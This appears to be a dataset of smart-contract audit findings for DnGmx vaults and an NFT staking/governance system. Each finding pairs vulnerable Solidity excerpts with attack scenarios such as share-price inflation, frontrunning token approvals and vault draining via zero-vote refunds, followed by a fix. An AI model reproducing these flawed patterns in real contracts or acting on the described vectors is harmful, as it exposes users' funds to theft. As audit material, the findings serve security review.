-DnGmxJuniorVaultManager#_rebalanceBorrow logic is flawed and could result in vault liquidationчhighчDnGmxJuniorVaultManager#_rebalanceBorrow fails to rebalance correctly if only one of the two assets needs a rebalance. In the case where one assets increases rapidly in price while the other stays constant, the vault may be liquidated.\\n```\\n // If both eth and btc swap amounts are not beyond the threshold then no flashloan needs to be executed | case 1\\n if (btcAssetAmount == 0 && ethAssetAmount == 0) return;\\n\\n if (repayDebtBtc && repayDebtEth) {\\n // case where both the token assets are USDC\\n // only one entry required which is combined asset amount for both tokens\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n assets[0] = address(state.usdc);\\n amounts[0] = (btcAssetAmount + ethAssetAmount);\\n } else if (btcAssetAmount == 0 || ethAssetAmount == 0) {\\n // Exactly one would be true since case-1 excluded (both false) | case-2\\n // One token amount = 0 and other token amount > 0\\n // only one entry required for the non-zero amount token\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n if (btcAssetAmount == 0) {\\n assets[0] = (repayDebtBtc ? address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\n\\nThe logic above is used to determine what assets to borrow using the flashloan. If the rebalance amount is under a threshold then the assetAmount is set equal to zero. The first check `if (btcAssetAmount == 0 && ethAssetAmount == 0) return;` is a short circuit that returns if neither asset is above the threshold. The third check `else if (btcAssetAmount == 0 || ethAssetAmount == 0)` is the point of interest. Since we short circuit if both are zero then to meet this condition exactly one asset needs to be rebalanced. The logic that follows is where the error is. In the comments it indicates that it needs to enter with the non-zero amount token but the actual logic reflects the opposite. If `btcAssetAmount == 0` it actually tries to enter with wBTC which would be the zero amount asset.\\nThe result of this can be catastrophic for the vault. If one token increases in value rapidly while the other is constant the vault will only ever try to rebalance the one token but because of this logical error it will never actually complete the rebalance. If the token increase in value enough the vault would actually end up becoming liquidated.чSmall change to reverse the logic and make it correct:\\n```\\n- if (btcAssetAmount == 0) {\\n+ if (btcAssetAmount != 0) {\\n assets[0] = (repayDebtBtc ? address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\nчVault is unable to rebalance correctly if only one asset needs to be rebalanced, which can lead to the vault being liquidatedч```\\n // If both eth and btc swap amounts are not beyond the threshold then no flashloan needs to be executed | case 1\\n if (btcAssetAmount == 0 && ethAssetAmount == 0) return;\\n\\n if (repayDebtBtc && repayDebtEth) {\\n // case where both the token assets are USDC\\n // only one entry required which is combined asset amount for both tokens\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n assets[0] = address(state.usdc);\\n amounts[0] = (btcAssetAmount + ethAssetAmount);\\n } else if (btcAssetAmount == 0 || ethAssetAmount == 0) {\\n // Exactly one would be true since case-1 excluded (both false) | case-2\\n // One token amount = 0 and other token amount > 0\\n // only one entry required for the non-zero amount token\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n if (btcAssetAmount == 0) {\\n assets[0] = (repayDebtBtc ? address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\n -DnGmxJuniorVaultManager#_totalAssets current implementation doesn't properly maximize or minimizeчmediumчThe maximize input to DnGmxJuniorVaultManager#_totalAssets indicates whether to either maximize or minimize the NAV. Internal logic of the function doesn't accurately reflect that because under some circumstances, maximize = true actually returns a lower value than maximize = false.\\n```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n```\\n\\nTo maximize the estimate for the NAV of the vault underlying debt should minimized and value of held assets should be maximized. Under the current settings there is a mix of both of those and the function doesn't consistently minimize or maximize. Consider when NAV is \"maxmized\". Under this scenario the value of when estimated the GlpPrice is minimized. This minimizes the value of both the borrowedGlp (debt) and of the unhedgedGlp (assets). The result is that the NAV is not maximized because the value of the assets are also minimized. In this scenario the GlpPrice should be maximized when calculating the assets and minimized when calculating the debt. The reverse should be true when minimizing the NAV. Slippage requirements are also applied incorrectly when adjusting borrowValueGlp. The current implementation implies that if the debt were to be paid back that the vault would repay their debt for less than expected. When paying back debt the slippage should imply paying more than expected rather than less, therefore the slippage should be added rather than subtracted.чTo properly maximize the it should assume the best possible rate for exchanging it's assets. Likewise to minimize it should assume it's debt is a large as possible and this it encounters maximum possible slippage when repaying it's debt. I recommend the following changes:\\n```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n- _getGlpPrice(state, !maximize)\\n+ _getGlpPrice(state, maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n- if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n+ if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS + state.slippageThresholdGmxBps, MAX_BPS);\\n```\\nчDnGmxJuniorVaultManager#_totalAssets doesn't accurately reflect NAV. Since this is used when determining critical parameters it may lead to inaccuracies.ч```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n```\\n -`Staking.unstake()` doesn't decrease the original voting power that was used in `Staking.stake()`.чhighч`Staking.unstake()` doesn't decrease the original voting power that was used in `Staking.stake()`.\\nWhen users stake/unstake the underlying NFTs, it calculates the token voting power using getTokenVotingPower() and increases/decreases their voting power accordingly.\\n```\\n function getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n\\nBut `getTokenVotingPower()` uses some parameters like `monsterMultiplier` and `baseVotes` and the output would be changed for the same `tokenId` after the admin changed these settings.\\nCurrently, `_stake()` and `_unstake()` calculates the token voting power independently and the below scenario would be possible.\\nAt the first time, `baseVotes = 20, monsterMultiplier = 50`.\\nA user staked a `FrankenMonsters` and his voting power = 10 here.\\nAfter that, the admin changed `monsterMultiplier = 60`.\\nWhen a user tries to unstake the NFT, the token voting power will be `20 * 60 / 100 = 12` here.\\nSo it will revert with uint underflow here.\\nAfter all, he can't unstake the NFT.чI think we should add a mapping like `tokenVotingPower` to save an original token voting power when users stake the token and decrease the same amount when they unstake.ч`votesFromOwnedTokens` might be updated wrongly or users can't unstake for the worst case because it doesn't decrease the same token voting power while unstaking.ч```\\n function getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n -Staking#_unstake removes votes from wrong person if msg.sender != ownerчhighчStaking#_unstake allows any msg.sender to unstake tokens for any owner that has approved them. The issue is that even when msg.sender != owner the votes are removed from msg.sender instead of owner. The result is that the owner keeps their votes and msg.sender loses theirs. This could be abused to hijack or damage voting.\\n```\\naddress owner = ownerOf(_tokenId);\\nif (msg.sender != owner && !isApprovedForAll[owner][msg.sender] && msg.sender != getApproved[_tokenId]) revert NotAuthorized();\\n```\\n\\nStaking#_unstake allows any msg.sender to unstake tokens for any owner that has approved them.\\n```\\nuint lostVotingPower;\\nfor (uint i = 0; i < numTokens; i++) {\\n lostVotingPower += _unstakeToken(_tokenIds[i], _to);\\n}\\n\\nvotesFromOwnedTokens[msg.sender] -= lostVotingPower;\\n// Since the delegate currently has the voting power, it must be removed from their balance\\n// If the user doesn't delegate, delegates(msg.sender) will return self\\ntokenVotingPower[getDelegate(msg.sender)] -= lostVotingPower;\\ntotalTokenVotingPower -= lostVotingPower;\\n```\\n\\nAfter looping through _unstakeToken all accumulated votes are removed from msg.sender. The problem with this is that msg.sender is allowed to unstake tokens for users other than themselves and in these cases they will lose votes rather than the user who owns the token.\\nExample: User A and User B both stake tokens and have 10 votes each. User A approves User B to unstake their tokens. User B calls unstake for User A. User B is msg.sender and User A is owner. The votes should be removed from owner but instead are removed from msg.sender. The result is that after unstaking User B has a vote balance of 0 while still having their locked token and User B has a vote balance of 10 and their token back. Now User B is unable to unstake their token because their votes will underflow on unstake, permanently trapping their NFT.чRemove the ability for users to unstake for other usersчVotes are removed incorrectly if msg.sender != owner. By extension this would forever trap msg.sender tokens in the contract.ч```\\naddress owner = ownerOf(_tokenId);\\nif (msg.sender != owner && !isApprovedForAll[owner][msg.sender] && msg.sender != getApproved[_tokenId]) revert NotAuthorized();\\n```\\n -castVote can be called by anyone even those without votesчmediumчGovernance#castVote can be called by anyone, even users that don't have any votes. Since the voting refund is per address, an adversary could use a large number of addresses to vote with zero votes to drain the vault.\\n```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n\\nNowhere in the flow of voting does the function revert if the user calling it doesn't actually have any votes. staking#getVotes won't revert under any circumstances. Governance#_castVote only reverts if 1) the proposal isn't active 2) support > 2 or 3) if the user has already voted. The result is that any user can vote even if they don't have any votes, allowing users to maliciously burn vault funds by voting and claiming the vote refund.чGovernance#_castVote should revert if msg.sender doesn't have any votes:\\n```\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n+ if (votes == 0) revert NoVotes();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n```\\nчVault can be drained maliciously by users with no votesч```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n -Delegate can keep can keep delegatee trapped indefinitelyчmediumчUsers are allowed to delegate their votes to other users. Since staking does not implement checkpoints, users are not allowed to delegate or unstake during an active proposal if their delegate has already voted. A malicious delegate can abuse this by creating proposals so that there is always an active proposal and their delegatees are always locked to them.\\n```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n\\nThe above modifier is applied when unstaking or delegating. This reverts if the delegate of msg.sender either has voted or currently has an open proposal. The result is that under those conditions, the delgatee cannot unstake or delegate. A malicious delegate can abuse these conditions to keep their delegatees forever delegated to them. They would keep opening proposals so that delegatees could never unstake or delegate. A single users can only have a one proposal opened at the same time so they would use a secondary account to alternate and always keep an active proposal.чThere should be a function to emergency eject the token from staking. To prevent abuse a token that has been emergency ejected should be blacklisted from staking again for a certain cooldown period, such as the length of current voting period.чDelegatees can never unstake or delegate to anyone elseч```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n -If a user approves junior vault tokens to WithdrawPeriphery, anyone can withdraw/redeem his/her tokenчhighчIf users want to withdraw/redeem tokens by WithdrawPeriphery, they should approve token approval to WithdrawPeriphery, then call `withdrawToken()` or `redeemToken()`. But if users approve `dnGmxJuniorVault` to WithdrawPeriphery, anyone can withdraw/redeem his/her token.\\nUsers should approve `dnGmxJuniorVault` before calling `withdrawToken()` or redeemToken():\\n```\\n function withdrawToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sGlpAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), from);\\n// rest of code\\n\\n function redeemToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sharesAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), from);\\n// rest of code\\n```\\n\\nFor better user experience, we always use `approve(WithdrawPeriphery, type(uint256).max)`. It means that if Alice approves the max amount, anyone can withdraw/redeem her tokens anytime. Another scenario is that if Alice approves 30 amounts, she wants to call `withdrawToken` to withdraw 30 tokens. But in this case Alice should send two transactions separately, then an attacker can frontrun `withdrawToken` transaction and withdraw Alice's token.чReplace `from` parameter by `msg.sender`.\\n```\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), msg.sender);\\n\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), msg.sender);\\n```\\nчAttackers can frontrun withdraw/redeem transactions and steal tokens. And some UI always approves max amount, which means that anyone can withdraw users tokens.ч```\\n function withdrawToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sGlpAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.withdraw(sGlpAmount, address(this), from);\\n// rest of code\\n\\n function redeemToken(\\n address from,\\n address token,\\n address receiver,\\n uint256 sharesAmount\\n ) external returns (uint256 amountOut) {\\n // user has approved periphery to use junior vault shares\\n dnGmxJuniorVault.redeem(sharesAmount, address(this), from);\\n// rest of code\\n```\\n -DnGmxJuniorVaultManager#harvestFees can push junior vault borrowedUSDC above borrow cap and DOS vaultчmediumчDnGmxJuniorVaultManager#harvestFees grants fees to the senior vault by converting the WETH to USDC and staking it directly. The result is that the senior vault gains value indirectly by increasing the debt of the junior vault. If the junior vault is already at it's borrow cap this will push it's total borrow over the borrow cap causing DnGmxSeniorVault#availableBorrow to underflow and revert. This is called each time a user deposits or withdraws from the junior vault meaning that the junior vault can no longer deposit or withdraw.\\n```\\n if (_seniorVaultWethRewards > state.wethConversionThreshold) {\\n // converts senior tranche share of weth into usdc and deposit into AAVE\\n // Deposit aave vault share to AAVE in usdc\\n uint256 minUsdcAmount = _getTokenPriceInUsdc(state, state.weth).mulDivDown(\\n _seniorVaultWethRewards * (MAX_BPS - state.slippageThresholdSwapEthBps),\\n MAX_BPS * PRICE_PRECISION\\n );\\n // swaps weth into usdc\\n (uint256 aaveUsdcAmount, ) = state._swapToken(\\n address(state.weth),\\n _seniorVaultWethRewards,\\n minUsdcAmount\\n );\\n\\n // supplies usdc into AAVE\\n state._executeSupply(address(state.usdc), aaveUsdcAmount);\\n\\n // resets senior tranche rewards\\n state.seniorVaultWethRewards = 0;\\n```\\n\\nThe above lines converts the WETH owed to the senior vault to USDC and deposits it into Aave. Increasing the aUSDC balance of the junior vault.\\n```\\nfunction getUsdcBorrowed() public view returns (uint256 usdcAmount) {\\n return\\n uint256(\\n state.aUsdc.balanceOf(address(this)).toInt256() -\\n state.dnUsdcDeposited -\\n state.unhedgedGlpInUsdc.toInt256()\\n );\\n}\\n```\\n\\nThe amount of USDC borrowed is calculated based on the amount of aUSDC that the junior vault has. By depositing the fees directly above, the junior vault has effectively \"borrowed\" more USDC. This can be problematic if the junior vault is already at it's borrow cap.\\n```\\nfunction availableBorrow(address borrower) public view returns (uint256 availableAUsdc) {\\n uint256 availableBasisCap = borrowCaps[borrower] - IBorrower(borrower).getUsdcBorrowed();\\n uint256 availableBasisBalance = aUsdc.balanceOf(address(this));\\n\\n availableAUsdc = availableBasisCap < availableBasisBalance ? availableBasisCap : availableBasisBalance;\\n}\\n```\\n\\nIf the vault is already at it's borrow cap then the line calculating `availableBasisCap` will underflow and revert.чCheck if borrowed exceeds borrow cap and return zero to avoid underflow:\\n```\\nfunction availableBorrow(address borrower) public view returns (uint256 availableAUsdc) {\\n\\n+ uint256 borrowCap = borrowCaps[borrower];\\n+ uint256 borrowed = IBorrower(borrower).getUsdcBorrowed();\\n\\n+ if (borrowed > borrowCap) return 0;\\n\\n+ uint256 availableBasisCap = borrowCap - borrowed;\\n\\n- uint256 availableBasisCap = borrowCaps[borrower] - IBorrower(borrower).getUsdcBorrowed();\\n uint256 availableBasisBalance = aUsdc.balanceOf(address(this));\\n\\n availableAUsdc = availableBasisCap < availableBasisBalance ? availableBasisCap : availableBasisBalance;\\n}\\n```\\nчavailableBorrow will revert causing deposits/withdraws to revertч```\\n if (_seniorVaultWethRewards > state.wethConversionThreshold) {\\n // converts senior tranche share of weth into usdc and deposit into AAVE\\n // Deposit aave vault share to AAVE in usdc\\n uint256 minUsdcAmount = _getTokenPriceInUsdc(state, state.weth).mulDivDown(\\n _seniorVaultWethRewards * (MAX_BPS - state.slippageThresholdSwapEthBps),\\n MAX_BPS * PRICE_PRECISION\\n );\\n // swaps weth into usdc\\n (uint256 aaveUsdcAmount, ) = state._swapToken(\\n address(state.weth),\\n _seniorVaultWethRewards,\\n minUsdcAmount\\n );\\n\\n // supplies usdc into AAVE\\n state._executeSupply(address(state.usdc), aaveUsdcAmount);\\n\\n // resets senior tranche rewards\\n state.seniorVaultWethRewards = 0;\\n```\\n -WithdrawPeriphery#_convertToToken slippage control is broken for any token other than USDCчmediumчWithdrawPeriphery allows the user to redeem junior share vaults to any token available on GMX, applying a fixed slippage threshold to all redeems. The slippage calculation always returns the number of tokens to 6 decimals. This works fine for USDC but for other tokens like WETH or WBTC that are 18 decimals the slippage protection is completely ineffective and can lead to loss of funds for users that are withdrawing.\\n```\\nfunction _convertToToken(address token, address receiver) internal returns (uint256 amountOut) {\\n // this value should be whatever glp is received by calling withdraw/redeem to junior vault\\n uint256 outputGlp = fsGlp.balanceOf(address(this));\\n\\n // using min price of glp because giving in glp\\n uint256 glpPrice = _getGlpPrice(false);\\n\\n // using max price of token because taking token out of gmx\\n uint256 tokenPrice = gmxVault.getMaxPrice(token);\\n\\n // apply slippage threshold on top of estimated output amount\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n\\n // will revert if atleast minTokenOut is not received\\n amountOut = rewardRouter.unstakeAndRedeemGlp(address(token), outputGlp, minTokenOut, receiver);\\n}\\n```\\n\\nWithdrawPeriphery allows the user to redeem junior share vaults to any token available on GMX. To prevent users from losing large amounts of value to MEV the contract applies a fixed percentage slippage. minToken out is returned to 6 decimals regardless of the token being requested. This works for tokens with 6 decimals like USDC, but is completely ineffective for the majority of tokens that aren't.чAdjust minTokenOut to match the decimals of the token:\\n```\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n+ minTokenOut = minTokenOut * 10 ** (token.decimals() - 6);\\n```\\nчUsers withdrawing tokens other than USDC can suffer huge loss of funds due to virtually no slippage protectionч```\\nfunction _convertToToken(address token, address receiver) internal returns (uint256 amountOut) {\\n // this value should be whatever glp is received by calling withdraw/redeem to junior vault\\n uint256 outputGlp = fsGlp.balanceOf(address(this));\\n\\n // using min price of glp because giving in glp\\n uint256 glpPrice = _getGlpPrice(false);\\n\\n // using max price of token because taking token out of gmx\\n uint256 tokenPrice = gmxVault.getMaxPrice(token);\\n\\n // apply slippage threshold on top of estimated output amount\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n\\n // will revert if atleast minTokenOut is not received\\n amountOut = rewardRouter.unstakeAndRedeemGlp(address(token), outputGlp, minTokenOut, receiver);\\n}\\n```\\n -WithdrawPeriphery uses incorrect value for MAX_BPS which will allow much higher slippage than intendedчmediumчWithdrawPeriphery accidentally uses an incorrect value for MAX_BPS which will allow for much higher slippage than intended.\\n```\\nuint256 internal constant MAX_BPS = 1000;\\n```\\n\\nBPS is typically 10,000 and using 1000 is inconsistent with the rest of the ecosystem contracts and tests. The result is that slippage values will be 10x higher than intended.чCorrect MAX_BPS:\\n```\\n- uint256 internal constant MAX_BPS = 1000;\\n+ uint256 internal constant MAX_BPS = 10_000;\\n```\\nчUnexpected slippage resulting in loss of user funds, likely due to MEVч```\\nuint256 internal constant MAX_BPS = 1000;\\n```\\n -Early depositors to DnGmxSeniorVault can manipulate exchange rates to steal funds from later depositorsчmediumчTo calculate the exchange rate for shares in DnGmxSeniorVault it divides the total supply of shares by the totalAssets of the vault. The first deposit can mint a very small number of shares then donate aUSDC to the vault to grossly manipulate the share price. When later depositor deposit into the vault they will lose value due to precision loss and the adversary will profit.\\n```\\nfunction convertToShares(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());\\n}\\n```\\n\\nShare exchange rate is calculated using the total supply of shares and the totalAsset. This can lead to exchange rate manipulation. As an example, an adversary can mint a single share, then donate 1e8 aUSDC. Minting the first share established a 1:1 ratio but then donating 1e8 changed the ratio to 1:1e8. Now any deposit lower than 1e8 (100 aUSDC) will suffer from precision loss and the attackers share will benefit from it.\\nThis same vector is present in DnGmxJuniorVault.чInitialize should include a small deposit, such as 1e6 aUSDC that mints the share to a dead address to permanently lock the exchange rate:\\n```\\n aUsdc.approve(address(pool), type(uint256).max);\\n IERC20(asset).approve(address(pool), type(uint256).max);\\n\\n+ deposit(1e6, DEAD_ADDRESS);\\n```\\nчAdversary can effectively steal funds from later usersч```\\nfunction convertToShares(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());\\n}\\n```\\n -The total community voting power is updated incorrectly when a user delegates.чhighчWhen a user delegates their voting power from staked tokens, the total community voting power should be updated. But the update logic is not correct, the the total community voting power could be wrong values.\\n```\\n tokenVotingPower[currentDelegate] -= amount;\\n tokenVotingPower[_delegatee] += amount; \\n\\n // If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\n if (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n // If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n } else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n }\\n```\\n\\nWhen the total community voting power is increased in the first if statement, _delegator's token voting power might be positive already and community voting power might be added to total community voting power before.\\nAlso, currentDelegate's token voting power might be still positive after delegation so we shouldn't remove the communitiy voting power this time.чAdd more conditions to check if the msg.sender delegated or not.\\n```\\n if (_delegator == _delegatee) {\\n if(tokenVotingPower[_delegatee] == amount) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n }\\n if(tokenVotingPower[currentDelegate] == 0) {\\n _updateTotalCommunityVotingPower(currentDelegate, false); \\n }\\n } else if (currentDelegate == _delegator) {\\n if(tokenVotingPower[_delegatee] == amount) {\\n _updateTotalCommunityVotingPower(_delegatee, true);\\n }\\n if(tokenVotingPower[_delegator] == 0) {\\n _updateTotalCommunityVotingPower(_delegator, false); \\n }\\n }\\n```\\nчThe total community voting power can be incorrect.ч```\\n tokenVotingPower[currentDelegate] -= amount;\\n tokenVotingPower[_delegatee] += amount; \\n\\n // If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\n if (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n // If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n } else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n }\\n```\\n -Staking#changeStakeTime and changeStakeAmount are problematic given current staking designчmediumчStaking#changeStakeTime and changeStakeAmount allow the locking bonus to be modified. Any change to this value will cause voting imbalance in the system. If changes result in a higher total bonus then existing stakers will be given a permanent advantage over new stakers. If the bonus is increased then existing stakers will be at a disadvantage because they will be locked and unable to realize the new staking bonus.\\n```\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n unlockTime[_tokenId] = _unlockTime;\\n uint fullStakedTimeBonus = ((_unlockTime - block.timestamp) * stakingSettings.maxStakeBonusAmount) / stakingSettings.maxStakeBonusTime;\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? fullStakedTimeBonus : fullStakedTimeBonus / 2;\\n }\\n```\\n\\nWhen a token is staked their stakeTimeBonus is 